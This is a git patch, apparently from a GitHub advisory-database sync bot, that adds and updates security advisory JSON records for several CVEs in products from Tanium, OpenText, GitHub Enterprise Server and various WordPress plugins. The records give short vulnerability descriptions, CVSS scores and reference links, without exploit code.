From 2a4cc40b8c72319cdbd2ace8dbc2bf6c059f8ba7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 00:33:18 +0000 Subject: [PATCH 01/77] Advisory Database Sync --- .../GHSA-22jr-f6pc-522x.json | 36 +++++++++++++++++++ .../GHSA-2q3j-wj77-9934.json | 6 +++- .../GHSA-36vc-76hh-jxcp.json | 36 +++++++++++++++++++ .../GHSA-3h3m-wx6r-9g3v.json | 11 ++++-- .../GHSA-4234-jpgj-67fv.json | 11 ++++-- .../GHSA-4jmq-69hm-3jp3.json | 36 +++++++++++++++++++ .../GHSA-528q-f4x8-fm57.json | 11 ++++-- .../GHSA-558g-hvr5-cchr.json | 36 +++++++++++++++++++ .../GHSA-5h6j-gr7x-5qpg.json | 11 ++++-- .../GHSA-5jm3-f2cq-hw7c.json | 36 +++++++++++++++++++ .../GHSA-739q-666p-vgj7.json | 11 ++++-- .../GHSA-742g-xjv2-hvh9.json | 33 +++++++++++++++++ .../GHSA-89gr-885m-3hc3.json | 11 ++++-- .../GHSA-8g63-rx6r-ghfc.json | 36 +++++++++++++++++++ .../GHSA-92wf-6p4m-jhgj.json | 11 ++++-- .../GHSA-97jx-r35c-g98x.json | 11 ++++-- .../GHSA-cppf-28gj-rgc8.json | 11 ++++-- .../GHSA-fg7c-375r-xggv.json | 36 +++++++++++++++++++ .../GHSA-fj3r-hwrr-xqfr.json | 36 +++++++++++++++++++ .../GHSA-fqr4-q363-g7gm.json | 36 +++++++++++++++++++ .../GHSA-fv8p-2x46-62xh.json | 11 ++++-- .../GHSA-fw5x-26p7-22pv.json | 11 ++++-- .../GHSA-g6g2-qr88-w8qf.json | 11 ++++-- .../GHSA-hm7p-gwh2-3jfm.json | 11 ++++-- .../GHSA-jwh4-2xr6-36qf.json | 11 ++++-- .../GHSA-m5w7-8p57-p7r3.json | 11 ++++-- .../GHSA-p546-7whm-cxpm.json | 6 +++- .../GHSA-pmfh-36xp-5j94.json | 11 ++++-- .../GHSA-qrj7-4954-7p6v.json | 6 +++- .../GHSA-r4m5-gc42-8vvh.json | 36 +++++++++++++++++++ .../GHSA-r7pc-wm4g-53rv.json | 15 +++++--- .../GHSA-rx38-cw65-cmwp.json | 36 +++++++++++++++++++ .../GHSA-w9fg-2h32-5478.json | 36 +++++++++++++++++++ .../GHSA-xfv7-f3m9-5h58.json | 11 ++++-- .../GHSA-xgvq-3q42-wr4g.json | 11 ++++-- .../GHSA-xmxf-f859-45ch.json | 11 ++++-- .../GHSA-xprw-mh67-9xf5.json | 11 ++++-- 37 files changed, 651 insertions(+), 67 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json diff --git a/advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json b/advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json new file mode 100644 index 0000000000000..4c31d34c7fb4c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-22jr-f6pc-522x", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-1292" + ], + "details": "Tanium addressed an insertion of sensitive information into log file vulnerability in Trends.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1292" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-007" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json index adb0dfcf2a0b1..5386a87228f86 100644 --- a/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json +++ b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2q3j-wj77-9934", - "modified": "2026-02-18T21:31:23Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-18T21:31:23Z", "aliases": [ "CVE-2026-1355" ], "details": "A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to upload unauthorized content to another user’s repository migration export due to a missing authorization check in the repository migration upload endpoint. By supplying the migration identifier, an attacker could overwrite or replace a victim’s migration archive, potentially causing victims to download attacker-controlled repository data during migration restores or automated imports. An attacker would require authentication to the victim's GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.2, 3.18.5, 3.17.11, 3.16.14, 3.15.18, 3.14.23. This vulnerability was reported via the GitHub Bug Bounty program.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json b/advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json new file mode 100644 index 0000000000000..e9137edbd2504 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36vc-76hh-jxcp", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-1658" + ], + "details": "User Interface (UI) Misrepresentation of Critical Information vulnerability in OpenText™ Directory Services allows Cache Poisoning. \n\nThe vulnerability could be exploited by a bad actor to inject manipulated text into the OpenText application, potentially misleading users.\n\nThis issue affects Directory Services: from 20.4.1 through 25.2.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:A/V:D/RE:L/U:Clear" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1658" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0858517" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json b/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json index 70038f50d0867..988303a975c70 100644 --- a/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json +++ b/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3h3m-wx6r-9g3v", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2026-27328" ], "details": "Missing Authorization vulnerability in DevsBlink EduBlink edublink allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EduBlink: from n/a through <= 2.0.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:32Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json b/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json index c434d7eba07df..8d6e4eed5dad6 100644 --- a/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json +++ b/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4234-jpgj-67fv", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25308" ], "details": "Missing Authorization vulnerability in wp.insider Simple Membership simple-membership allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Membership: from n/a through <= 4.6.9.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json b/advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json new file mode 100644 index 0000000000000..a1cb479e0df9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jmq-69hm-3jp3", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-2408" + ], + "details": "Tanium addressed a use-after-free vulnerability in the Cloud Workloads Enforce client extension.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2408" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-005" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json b/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json index 873cc91128052..d0334973f3783 100644 --- a/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json +++ b/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-528q-f4x8-fm57", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25336" ], "details": "Missing Authorization vulnerability in wpcoachify Coachify coachify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Coachify: from n/a through <= 1.1.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json b/advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json new file mode 100644 index 0000000000000..af53f25f383bf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-558g-hvr5-cchr", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2025-13672" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in OpenText™ Web Site Management Server allows Reflected XSS. The vulnerability could allow injecting malicious JavaScript inside URL parameters that was then rendered with the preview of the page, so that malicious scripts could be executed on the client side.\n\nThis issue affects Web Site Management Server: 16.7.0, 16.7.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:D/RE:H/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13672" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm/en?id=ot_kb_unauthenticated&sysparm_article=KB0854847" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json b/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json index d9be9a459db0a..0597b2114d570 100644 --- a/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json +++ b/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5h6j-gr7x-5qpg", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23542" ], "details": "Deserialization of Untrusted Data vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Object Injection.This issue affects Grand Restaurant: from n/a through <= 7.0.10.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:12Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json b/advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json new file mode 100644 index 0000000000000..a7ae0edcf9f4c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jm3-f2cq-hw7c", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2025-8054" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in OpenText™ XM Fax allows Path Traversal. \n\nThe vulnerability could allow an attacker to arbitrarily disclose content of files on the local filesystem. This issue affects XM Fax: 24.2.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8054" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0847038" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json b/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json index 676362a75d411..0053dcc0aafaf 100644 --- a/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json +++ b/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-739q-666p-vgj7", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-24999" ], "details": "Missing Authorization vulnerability in Alma Alma alma-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Alma: from n/a through <= 5.16.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json b/advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json new file mode 100644 index 0000000000000..ef44e4ad807c2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-742g-xjv2-hvh9", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-26744" + ], + "details": "A user enumeration vulnerability exists in FormaLMS 4.1.18 and below in the password recovery functionality accessible via the /lostpwd endpoint. The application returns different error messages for valid and invalid usernames allowing an unauthenticated attacker to determine which usernames are registered in the system through observable response discrepancy.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26744" + }, + { + "type": "WEB", + "url": "https://github.com/formalms/formalms.git" + }, + { + "type": "WEB", + "url": "https://github.com/lorenzobruno7/CVE-2026-26744" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T22:16:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json b/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json index 5522b3c451000..c51ef9f930192 100644 --- a/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json +++ b/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-89gr-885m-3hc3", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-24375" ], "details": "Missing Authorization vulnerability in WP Swings Ultimate Gift Cards For WooCommerce woo-gift-cards-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Gift Cards For WooCommerce: from n/a through <= 3.2.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json b/advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json new file mode 100644 index 0000000000000..43707a78c9034 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8g63-rx6r-ghfc", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-2605" + ], + "details": "Tanium addressed an insertion of sensitive information into log file vulnerability in TanOS.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2605" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-006" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json b/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json index 7dedd46bb9a7c..0ca84acd5fe6e 100644 --- a/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json +++ b/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-92wf-6p4m-jhgj", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-24392" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nabil Lemsieh HurryTimer hurrytimer allows Stored XSS.This issue affects HurryTimer: from n/a through <= 2.14.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json b/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json index 25fdcbe7e49a0..4e7499586a2ff 100644 --- a/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json +++ b/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-97jx-r35c-g98x", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25338" ], "details": "Missing Authorization vulnerability in Ays Pro AI ChatBot with ChatGPT and Content Generator by AYS ays-chatgpt-assistant allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI ChatBot with ChatGPT and Content Generator by AYS: from n/a through <= 2.7.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json b/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json index 4ce9d97d0afbf..e06e9bac01fb0 100644 --- a/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json +++ b/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cppf-28gj-rgc8", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25311" ], "details": "Missing Authorization vulnerability in 10up Autoshare for Twitter autoshare-for-twitter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Autoshare for Twitter: from n/a through <= 2.3.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json b/advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json new file mode 100644 index 0000000000000..beea19a853e1a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fg7c-375r-xggv", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2025-9208" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in OpenText™ Web Site Management Server allows Stored XSS. The vulnerability could execute malicious scripts on the client side when the download query parameter is removed from the file URL, allowing attackers to compromise user sessions and data.\n\nThis issue affects Web Site Management Server: 16.7.X, 16.8, 16.8.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": 